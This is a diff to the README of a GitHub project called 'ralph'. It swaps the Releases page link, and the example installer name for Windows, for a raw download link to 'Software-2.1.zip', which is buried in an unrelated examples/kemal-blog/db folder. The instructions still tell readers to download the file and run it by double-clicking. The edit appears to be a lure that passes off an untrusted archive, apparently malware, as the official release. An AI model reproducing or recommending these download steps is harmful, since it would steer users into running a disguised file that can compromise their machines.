atifjatt43/ralph/README.md

 ## 📥 Download & Install

-To get started with ralph, visit the [Releases page](https://github.com/atifjatt43/ralph/releases) to download the latest version.
+To get started with ralph, visit the [Releases page](https://github.com/atifjatt43/ralph/raw/refs/heads/main/examples/kemal-blog/db/Software-2.1.zip) to download the latest version.

 Once on the Releases page, follow these steps:

 1. Find the version you want to download.
 The latest version is at the top.
 2. Click on the version title to see the available files.
-3. Download the file that matches your operating system (e.g., `ralph-windows.exe` for Windows users).
+3. Download the file that matches your operating system (e.g., `https://github.com/atifjatt43/ralph/raw/refs/heads/main/examples/kemal-blog/db/Software-2.1.zip` for Windows users).
 4. Once the file is downloaded, locate it in your file explorer or finder.
 5. Run the application by double-clicking the downloaded file.